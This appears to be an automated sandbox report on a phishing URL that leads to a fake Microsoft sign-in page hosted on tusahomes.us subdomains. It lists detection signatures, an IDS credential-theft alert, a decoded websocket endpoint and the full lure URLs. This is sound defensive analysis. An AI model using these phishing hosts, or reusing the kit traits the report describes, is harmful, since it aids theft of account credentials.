Edit tour

Windows Analysis Report
http://p1.pagewiz.net/vericastharlandclarke/

Overview

General Information

Sample URL:http://p1.pagewiz.net/vericastharlandclarke/
Analysis ID:1660141
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish54
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 4980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2368 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5056 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://p1.pagewiz.net/vericastharlandclarke/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.14..script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    3.25..script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      2.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        3.4.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          3.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-09T02:18:48.083200+020028570901Successful Credential Theft Detected137.184.178.231443192.168.2.549733TCP

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL '330c68f2903044fdaf0390e944b7092d.tusahomes.us' does not match the legitimate domain., The URL contains a random string and a domain 'tusahomes.us', which is not associated with Microsoft., The presence of input fields like 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts., The domain 'tusahomes.us' is unusual and not related to Microsoft, increasing suspicion. DOM: 3.7.pages.csv
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL '330c68f2903044fdaf0390e944b7092d.tusahomes.us' does not match the legitimate domain for Microsoft., The URL contains a long, random-looking subdomain which is a common tactic used in phishing., The domain 'tusahomes.us' is not associated with Microsoft and appears unrelated., The use of a '.us' domain extension is unusual for a global brand like Microsoft, which typically uses '.com'. DOM: 3.8.pages.csv
            Source: Yara matchFile source: 2.14..script.csv, type: HTML
            Source: Yara matchFile source: 3.25..script.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 3.4.pages.csv, type: HTML
            Source: Yara matchFile source: 3.5.pages.csv, type: HTML
            Source: Yara matchFile source: 3.8.pages.csv, type: HTML
            Source: Yara matchFile source: 3.6.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0HTTP Parser: Base64 decoded: wss://330c68f2903044fdaf0390e944b7092d.tusahomes.us/67f5bce71f9fd88e9ef40d75/
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: Iframe src: https://8f0da58963954c5ebda6645ba9a83b28.tusahomes.us/Me.htm?v=3
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: http://p1.pagewiz.net/vericastharlandclarke/HTTP Parser: No favicon
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0HTTP Parser: No favicon
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No favicon
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No favicon
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No favicon
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No favicon
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No favicon
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
